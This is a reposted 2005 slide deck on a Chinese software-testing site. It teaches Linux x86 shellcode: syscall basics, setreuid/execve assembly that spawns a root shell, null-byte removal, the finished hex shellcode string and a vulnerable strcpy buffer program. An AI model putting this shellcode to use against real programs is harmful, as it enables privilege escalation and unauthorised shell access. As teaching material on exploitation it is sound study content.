• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

Baisc Shell Code [转]

发布: 2007-7-04 12:06 | 作者: admin | 来源:  网友评论 | 查看: 13次 | 进入软件测试论坛讨论

领测软件测试网 Baisc Shell Code

Baisc Shell Code
dany@chroot.org
2005/02/19

2
Common Assembly Instructions
..mov <dest>, <src>
..add <dest>, <src> ; sub <dest>, <src>
..push <target> ; pop <target>
..jmp <address>
..call <address>
..lea <dest>, <src>
..int <value>

3
Linux System Calls
../usr/include/asm/unistd.h
..#ifndef _ASM_I386_UNISTD_H_
..#define _ASM_I386_UNISTD_H_
../*
..* This file contains the system call numbers.
..*/
..#define __NR_restart_syscall 0
..#define __NR_exit 1
..#define __NR_write 4
..#define __NR_execve 11

4
Hello world
..write & exit function
..EAX, EBX, ECX, EDX are used to
determine which function to call
..Then a int 0x80 to tell kernel

5
hello.asm#1
..; section declaration
..section .data
..msg db "hello, world!"

6
hello.asm#2
..; write call
..mov eax, 4 ;put 4 into eax
..mov ebx, 1 ;put stdout to ebx
..mov ecx, msg ;put the address of the msg
..mov edx, 13 ;string length
..int 0x80 ;call the kernel

7
Hello world#3
..; exit() call
..mov eax, 1 ;put 1 into eax
..mov ebx, 0 ;put 0 into ebx
..int 0x80 ;call the kernel

8
Shell-Spawning Code#1
..; setreuid(uid_t ruid, uid_t euid)
..mov eax, 70
..mov ebx, 0
..mov ecx, 0
..int 0x80
..; setreuid(0, 0);

9
Shell-Spawning Code#2
..section .data
..filepath db "/bin/shXAAAABBBB"
..; execve(const char *path, char *const argv[],
char *const envp[]);
..mov eax, 0 ;put 0 into eax
..mov ebx, filepath ;put the address of the string
..mov [ebx+7], al ;put 0 to where is X
..mov [ebx+8], ebx ;put address of the string to AAAA
..mov [ebx+12], eax ;put NULL to BBBB

10
Shell-Spawning Code#3
..mov eax, 11 ;execve is syscall #11
..;load the address of where the AAAA was into ecx
..lea ecx, [ebx+8]
..; load the address of where the AAAA was into edx
..lea edx, [ebx+12]
..int 0x80
..The last arguments for execve() function need to be
pointers of pointers.

11
Avoiding Using Other Segments
jmp two
one:
pop ebx
<program code here>
two:
call one
db ‘this a string’

12
Removing Null Bytes
mov ebx, 0
xor ebx, ebx
mov eax, 70
B8 46 00 00 00
xor eax, eax
mov al, 70

13
Result shell code
..nasm shellcode.asm
..Hexedit shellcode
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

14
vuln.c & exploit.c
#include <stdlib.h>
int main(int argc, char* argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}

15
etc…
..Smaller shellcode using the stack
..Printable ASCII Instructions
..ASCII Printable Polymorphic Shellcode
..Other system shellcode

Thanks
Question?

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/


关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备2023014753号-2
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网